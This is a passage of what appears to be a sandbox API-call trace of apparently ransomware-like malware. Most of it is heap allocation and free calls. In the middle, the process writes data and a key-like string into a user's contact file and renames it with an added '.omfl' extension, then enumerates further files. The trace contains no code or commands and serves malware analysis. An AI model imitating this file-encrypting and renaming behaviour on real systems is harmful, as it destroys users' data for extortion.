[0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ae8 | out: hHeap=0x4970000) returned 1 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a88 | out: hHeap=0x4970000) returned 1 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.240] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.240] GetCurrentThreadId () returned 0x618 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5500 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0x49c5028 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.240] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.241] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.241] GetCurrentThreadId () returned 0x618 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.241] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.241] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.241] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.241] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.241] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.241] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.241] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a88 [0130.241] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16ae8 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a70 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16b00 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.242] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.242] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a88 | out: hHeap=0x4970000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a88 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a88 | out: hHeap=0x4970000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.243] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.243] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b00 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ae8 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a70 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49c5028 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a58 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2b78 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.244] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.244] WriteFile (in: hFile=0x5c8, lpBuffer=0x757b558*, nNumberOfBytesToWrite=0x48f, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0x757b558*, lpNumberOfBytesWritten=0xe00fb14*=0x48f, lpOverlapped=0x0) returned 1 [0130.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.245] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.245] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.245] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.245] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.245] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.245] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.245] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.245] CloseHandle (hObject=0x5c8) returned 1 [0130.250] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.250] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x7516fe8 [0130.250] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.250] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.omfl")) returned 1 [0130.251] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.251] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.251] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.252] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.252] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0130.252] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0130.252] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750caf0 | out: hHeap=0x4970000) returned 1 [0130.252] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0130.252] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0130.252] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757ca08 [0130.252] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.254] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0130.254] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.255] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0130.255] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: 